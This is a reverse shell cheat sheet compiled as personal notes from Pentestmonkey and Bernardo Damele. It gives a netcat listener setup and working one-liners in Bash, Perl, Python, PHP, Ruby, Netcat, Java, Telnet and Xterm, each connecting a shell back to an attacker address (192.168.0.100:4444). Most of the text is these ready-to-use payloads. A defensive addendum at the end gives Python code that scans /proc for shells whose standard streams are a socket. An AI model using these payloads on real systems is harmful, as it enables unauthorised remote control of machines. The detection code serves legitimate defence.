There are many pages on the web documenting quick reverse shell one-liners. Pentestmonkey and Bernardo Damele have both created a good few posts between them, but I wanted to recapture what they've got for my notes purposes. (It's easier for me to find stuff if it's in one place.) All credit goes to both of those guys, where I got all this info from.

Step one – Set up your listener.

nc -l -v attackerip 4444

In all these examples the attacker IP will be 192.168.0.100.

Bash

exec 5<>/dev/tcp/192.168.0.100/4444
cat <&5 | while read line; do $line 2>&5 >&5; done

0<&196;exec 196<>/dev/tcp/192.168.0.100/4444; sh <&196 >&196 2>&196

bash -i >& /dev/tcp/192.168.0.100/4444 0>&1

Perl

perl -e 'use socket;$i="192.168.0.100";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

For Windows-based systems you can use:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"192.168.0.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("192.168.0.100",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("192.168.0.100",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

The following does not need /bin/sh:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.0.100","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

The following is for Windows-based systems:

ruby -rsocket -e 'c=TCPSocket.new("192.168.0.100","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

NetCat

nc -e /bin/sh 192.168.0.100 4444

nc -c /bin/sh 192.168.0.100 4444

/bin/sh | nc 192.168.0.100 4444

If your nc was built without the -e flag, you can get around it using the following:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Telnet

If netcat is missing (and in most cases you won't have it), then use telnet:

rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.0.100 4444 0/tmp/p

telnet 192.168.0.100 4444 | /bin/bash | telnet 192.168.0.100 4445
# also start a second listener on your machine on port 4445/tcp

Xterm

This one is a little trickier: you need to start a listener on the attacker box to catch the incoming xterm.

Xnest :1; xterm -display 127.0.0.1:1

and then inside the spawned xterm session run this:

xhost +victimip

Then on the victim you need to run this:

xterm -display 192.168.0.100:1
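As an added defensive counterpart (not part of the original cheat sheet): every variant above that uses /dev/tcp, dup2, fdopen or nc -e ends with an interactive shell whose stdin, stdout and stderr are the connected socket, and on Linux that shows up directly in /proc/<pid>/fd. The check below hunts for that footprint; the process names, pids and socket inode numbers in the sample table are constructed.

```python
import re
from pathlib import Path

# Shell binaries the one-liners above hand the connected socket to.
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh"}
# A /proc/<pid>/fd/N symlink that points at a socket reads "socket:[inode]".
SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")

def socket_backed_stdio(comm: str, fd_targets: dict[int, str]) -> bool:
    """True when a shell's fds 0, 1 and 2 all point at the same socket inode, the
    footprint left by the /dev/tcp, dup2 and fdopen variants. Restricting to shells
    avoids flagging inetd-style services, which legitimately get a socket on stdio."""
    if comm not in SHELL_NAMES:
        return False
    inodes = set()
    for fd in (0, 1, 2):
        m = SOCKET_RE.match(fd_targets.get(fd, ""))
        if not m:
            return False
        inodes.add(m.group(1))
    return len(inodes) == 1

def scan_proc(proc_root: str = "/proc") -> list[int]:
    # Walk a live /proc (Linux) and return the pids that match.
    hits = []
    for pid_dir in Path(proc_root).iterdir():
        if not pid_dir.name.isdigit():
            continue
        try:
            comm = (pid_dir / "comm").read_text().strip()
            targets = {int(f.name): str(f.readlink()) for f in (pid_dir / "fd").iterdir()}
        except OSError:
            continue  # process exited, or not ours to inspect
        if socket_backed_stdio(comm, targets):
            hits.append(int(pid_dir.name))
    return hits

# Constructed sample of comm + fd tables: a bash on a pty, the sh spawned by the
# python one-liner (fds 0-2 dup2'd from the socket still open on fd 3), the
# parent python3 itself, and a sh whose streams point at two different sockets.
SAMPLE = {
    4242: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    5150: ("sh", {0: "socket:[98765]", 1: "socket:[98765]", 2: "socket:[98765]", 3: "socket:[98765]"}),
    6000: ("python3", {0: "socket:[98765]", 1: "socket:[98765]", 2: "socket:[98765]"}),
    6001: ("sh", {0: "socket:[111]", 1: "socket:[222]", 2: "socket:[222]"}),
}

def scan_sample(sample=SAMPLE) -> list[int]:
    return [pid for pid, (comm, fds) in sample.items() if socket_backed_stdio(comm, fds)]
```

The mkfifo and telnet-pipe variants give the shell pipes rather than a socket, so they need a different hunt (a shell whose sibling on the same pipes is nc or telnet).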
